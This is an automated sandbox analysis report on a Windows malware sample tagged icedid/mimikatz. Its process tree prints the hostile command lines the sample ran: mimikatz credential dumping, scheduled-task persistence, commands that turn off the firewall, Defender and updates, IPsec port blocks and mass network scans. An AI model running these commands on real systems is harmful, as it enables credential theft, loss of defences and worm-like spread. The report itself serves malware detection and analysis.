Analysis

  • max time kernel
    30s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-02-2025 07:45

General

  • Target

    2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe

  • Size

    7.6MB

  • MD5

    94917c3185b5a3e214d99b1fd4db0ba5

  • SHA1

    0ecf5438cdedbdbcb0731badb0cb72efecea695a

  • SHA256

    0a479850ed6ef9b601088a0dee4e23850fe659a3e227bbc033f75ec84c37d3dd

  • SHA512

    3a2d5f2f817ca9db150adfb4c092eb93c697cb35d28f590542db08f46d4d0946cbf30a4754d266993efb4e2389fd64ddc1b9749d0676e3f1fdf976c0ff1c24a5

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (5115) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 11 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 7 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Drops file in System32 directory 5 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 4 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 10 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: RenamesItself
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\hfrembcb\emmcinc.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:4392
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 5
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:544
      • C:\Windows\hfrembcb\emmcinc.exe
        C:\Windows\hfrembcb\emmcinc.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:264
  • C:\Windows\hfrembcb\emmcinc.exe
    C:\Windows\hfrembcb\emmcinc.exe
    1⤵
    • Drops file in Drivers directory
    • Executes dropped EXE
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4692
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:372
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\system32\drivers\etc\hosts /T /D users
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2000
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1212
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4836
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4928
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1360
    • C:\Windows\SysWOW64\netsh.exe
      netsh ipsec static del all
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Location Discovery: System Language Discovery
      PID:8
    • C:\Windows\SysWOW64\netsh.exe
      netsh ipsec static add policy name=Bastards description=FuckingBastards
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Location Discovery: System Language Discovery
      PID:508
    • C:\Windows\SysWOW64\netsh.exe
      netsh ipsec static add filteraction name=BastardsList action=block
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Location Discovery: System Language Discovery
      PID:4380
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Windows\kgzubmrlg\uzpupigei\wpcap.exe /S
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4168
      • C:\Windows\kgzubmrlg\uzpupigei\wpcap.exe
        C:\Windows\kgzubmrlg\uzpupigei\wpcap.exe /S
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\SysWOW64\net.exe
          net stop "Boundary Meter"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1288
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "Boundary Meter"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4848
        • C:\Windows\SysWOW64\net.exe
          net stop "TrueSight Meter"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "TrueSight Meter"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3620
        • C:\Windows\SysWOW64\net.exe
          net stop npf
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5104
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop npf
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1892
        • C:\Windows\SysWOW64\net.exe
          net start npf
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1076
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 start npf
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3168
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c net start npf
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4252
      • C:\Windows\SysWOW64\net.exe
        net start npf
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1184
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 start npf
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1992
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c net start npf
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2304
      • C:\Windows\SysWOW64\net.exe
        net start npf
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4408
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 start npf
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3268
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Windows\kgzubmrlg\uzpupigei\lfguittcm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgzubmrlg\uzpupigei\Scant.txt
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4392
      • C:\Windows\kgzubmrlg\uzpupigei\lfguittcm.exe
        C:\Windows\kgzubmrlg\uzpupigei\lfguittcm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgzubmrlg\uzpupigei\Scant.txt
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2328
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Windows\kgzubmrlg\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kgzubmrlg\Corporate\log.txt
      2⤵
        PID:1648
        • C:\Windows\kgzubmrlg\Corporate\vfshost.exe
          C:\Windows\kgzubmrlg\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
          3⤵
            PID:976
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bttigkely" /ru system /tr "cmd /c C:\Windows\ime\emmcinc.exe"
          2⤵
            PID:1364
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:1552
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "bttigkely" /ru system /tr "cmd /c C:\Windows\ime\emmcinc.exe"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4452
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kfmcbwegp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hfrembcb\emmcinc.exe /p everyone:F"
              2⤵
                PID:4880
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:4624
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "kfmcbwegp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hfrembcb\emmcinc.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3588
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bcabtmbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lktiyiybb\wlittc.exe /p everyone:F"
                  2⤵
                    PID:2140
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                        PID:4176
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "bcabtmbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lktiyiybb\wlittc.exe /p everyone:F"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2860
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                      2⤵
                        PID:2988
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                        2⤵
                          PID:1636
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                          2⤵
                            PID:1764
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static set policy name=Bastards assign=y
                            2⤵
                              PID:3984
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                              2⤵
                                PID:2392
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                2⤵
                                  PID:756
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                  2⤵
                                    PID:3516
                                  • C:\Windows\SysWOW64\netsh.exe
                                    netsh ipsec static set policy name=Bastards assign=y
                                    2⤵
                                      PID:532
                                    • C:\Windows\SysWOW64\netsh.exe
                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                      2⤵
                                        PID:2220
                                      • C:\Windows\SysWOW64\netsh.exe
                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                        2⤵
                                          PID:4304
                                        • C:\Windows\SysWOW64\netsh.exe
                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                          2⤵
                                            PID:3440
                                          • C:\Windows\SysWOW64\netsh.exe
                                            netsh ipsec static set policy name=Bastards assign=y
                                            2⤵
                                              PID:2540
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                3⤵
                                                  PID:3268
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c net stop SharedAccess
                                                2⤵
                                                  PID:264
                                                  • C:\Windows\SysWOW64\net.exe
                                                    net stop SharedAccess
                                                    3⤵
                                                      PID:5040
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 stop SharedAccess
                                                        4⤵
                                                          PID:5080
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c netsh firewall set opmode mode=disable
                                                      2⤵
                                                        PID:4256
                                                        • C:\Windows\SysWOW64\netsh.exe
                                                          netsh firewall set opmode mode=disable
                                                          3⤵
                                                          • Modifies Windows Firewall
                                                          PID:4152
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c netsh Advfirewall set allprofiles state off
                                                        2⤵
                                                          PID:1796
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh Advfirewall set allprofiles state off
                                                            3⤵
                                                            • Modifies Windows Firewall
                                                            PID:2232
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c net stop MpsSvc
                                                          2⤵
                                                            PID:1544
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net stop MpsSvc
                                                              3⤵
                                                                PID:3104
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 stop MpsSvc
                                                                  4⤵
                                                                    PID:1532
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c net stop WinDefend
                                                                2⤵
                                                                  PID:1352
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    net stop WinDefend
                                                                    3⤵
                                                                      PID:400
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 stop WinDefend
                                                                        4⤵
                                                                          PID:2184
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c net stop wuauserv
                                                                      2⤵
                                                                        PID:4008
                                                                        • C:\Windows\SysWOW64\net.exe
                                                                          net stop wuauserv
                                                                          3⤵
                                                                            PID:4752
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 stop wuauserv
                                                                              4⤵
                                                                                PID:3436
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c sc config MpsSvc start= disabled
                                                                            2⤵
                                                                              PID:4504
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc config MpsSvc start= disabled
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:1288
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c sc config SharedAccess start= disabled
                                                                              2⤵
                                                                                PID:716
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  sc config SharedAccess start= disabled
                                                                                  3⤵
                                                                                  • Launches sc.exe
                                                                                  PID:3256
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c sc config WinDefend start= disabled
                                                                                2⤵
                                                                                  PID:3172
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc config WinDefend start= disabled
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    PID:1100
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c sc config wuauserv start= disabled
                                                                                  2⤵
                                                                                    PID:4828
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      sc config wuauserv start= disabled
                                                                                      3⤵
                                                                                      • Launches sc.exe
                                                                                      PID:4984
                                                                                  • C:\Windows\TEMP\xohudmc.exe
                                                                                    C:\Windows\TEMP\xohudmc.exe
                                                                                    2⤵
                                                                                      PID:2704
                                                                                    • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                      C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 768 C:\Windows\TEMP\kgzubmrlg\768.dmp
                                                                                      2⤵
                                                                                        PID:3712
                                                                                      • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                        C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 60 C:\Windows\TEMP\kgzubmrlg\60.dmp
                                                                                        2⤵
                                                                                          PID:4332
                                                                                        • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                          C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 2120 C:\Windows\TEMP\kgzubmrlg\2120.dmp
                                                                                          2⤵
                                                                                            PID:2972
                                                                                          • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                            C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 2652 C:\Windows\TEMP\kgzubmrlg\2652.dmp
                                                                                            2⤵
                                                                                              PID:4488
                                                                                            • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                              C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 2792 C:\Windows\TEMP\kgzubmrlg\2792.dmp
                                                                                              2⤵
                                                                                                PID:1456
                                                                                              • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 2816 C:\Windows\TEMP\kgzubmrlg\2816.dmp
                                                                                                2⤵
                                                                                                  PID:4860
                                                                                                • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                  C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 3148 C:\Windows\TEMP\kgzubmrlg\3148.dmp
                                                                                                  2⤵
                                                                                                    PID:920
                                                                                                  • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                    C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 3832 C:\Windows\TEMP\kgzubmrlg\3832.dmp
                                                                                                    2⤵
                                                                                                      PID:3284
                                                                                                    • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                      C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 3924 C:\Windows\TEMP\kgzubmrlg\3924.dmp
                                                                                                      2⤵
                                                                                                        PID:1648
                                                                                                      • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                        C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 3988 C:\Windows\TEMP\kgzubmrlg\3988.dmp
                                                                                                        2⤵
                                                                                                          PID:2908
                                                                                                        • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                          C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 4076 C:\Windows\TEMP\kgzubmrlg\4076.dmp
                                                                                                          2⤵
                                                                                                            PID:4808
                                                                                                          • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                            C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 672 C:\Windows\TEMP\kgzubmrlg\672.dmp
                                                                                                            2⤵
                                                                                                              PID:1740
                                                                                                            • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                              C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 4864 C:\Windows\TEMP\kgzubmrlg\4864.dmp
                                                                                                              2⤵
                                                                                                                PID:4976
                                                                                                              • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                                C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 4212 C:\Windows\TEMP\kgzubmrlg\4212.dmp
                                                                                                                2⤵
                                                                                                                  PID:1012
                                                                                                                • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                                  C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 3724 C:\Windows\TEMP\kgzubmrlg\3724.dmp
                                                                                                                  2⤵
                                                                                                                    PID:3300
                                                                                                                  • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                                    C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 916 C:\Windows\TEMP\kgzubmrlg\916.dmp
                                                                                                                    2⤵
                                                                                                                      PID:4724
                                                                                                                    • C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe
                                                                                                                      C:\Windows\TEMP\kgzubmrlg\gzbbccakc.exe -accepteula -mp 1720 C:\Windows\TEMP\kgzubmrlg\1720.dmp
                                                                                                                      2⤵
                                                                                                                        PID:1544
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd.exe /c C:\Windows\kgzubmrlg\uzpupigei\scan.bat
                                                                                                                        2⤵
                                                                                                                          PID:3712
                                                                                                                          • C:\Windows\kgzubmrlg\uzpupigei\wicsbblml.exe
                                                                                                                            wicsbblml.exe TCP 212.102.0.1 212.102.255.255 445 512 /save
                                                                                                                            3⤵
                                                                                                                              PID:4448
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                            2⤵
                                                                                                                              PID:2932
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                3⤵
                                                                                                                                  PID:3788
                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                                  3⤵
                                                                                                                                    PID:2616
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:6084
                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                                      3⤵
                                                                                                                                        PID:4548
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                        3⤵
                                                                                                                                          PID:3260
                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                                          3⤵
                                                                                                                                            PID:5128
                                                                                                                                      • C:\Windows\SysWOW64\yqiwma.exe
                                                                                                                                        C:\Windows\SysWOW64\yqiwma.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:2132
                                                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MDdCOTkzMTktRUMzOS00QjRCLUE3OUEtRTg0RDQxNjUxNTFCfSIgdXNlcmlkPSJ7QTU4Qjg0QjItMDNBQi00OTRDLUEyOTgtNjM0RTU0Q0NGMDU3fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7ODkzMEJCRUMtOTY4NC00MEUxLTk1QTItODA0NjAzNzQwMTFDfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDQ5MjgiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxNzQzMjM4OTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MTQzMjc1MDg5Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                                                                                                                                          1⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          PID:1776
                                                                                                                                        • C:\Windows\TEMP\lktiyiybb\wlittc.exe
                                                                                                                                          "C:\Windows\TEMP\lktiyiybb\wlittc.exe"
                                                                                                                                          1⤵
                                                                                                                                            PID:1436
                                                                                                                                          • C:\Windows\system32\cmd.EXE
                                                                                                                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\emmcinc.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:2268
                                                                                                                                              • C:\Windows\ime\emmcinc.exe
                                                                                                                                                C:\Windows\ime\emmcinc.exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:1632
                                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lktiyiybb\wlittc.exe /p everyone:F
                                                                                                                                                1⤵
                                                                                                                                                  PID:3604
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2040
                                                                                                                                                    • C:\Windows\system32\cacls.exe
                                                                                                                                                      cacls C:\Windows\TEMP\lktiyiybb\wlittc.exe /p everyone:F
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3384
                                                                                                                                                    • C:\Windows\system32\cmd.EXE
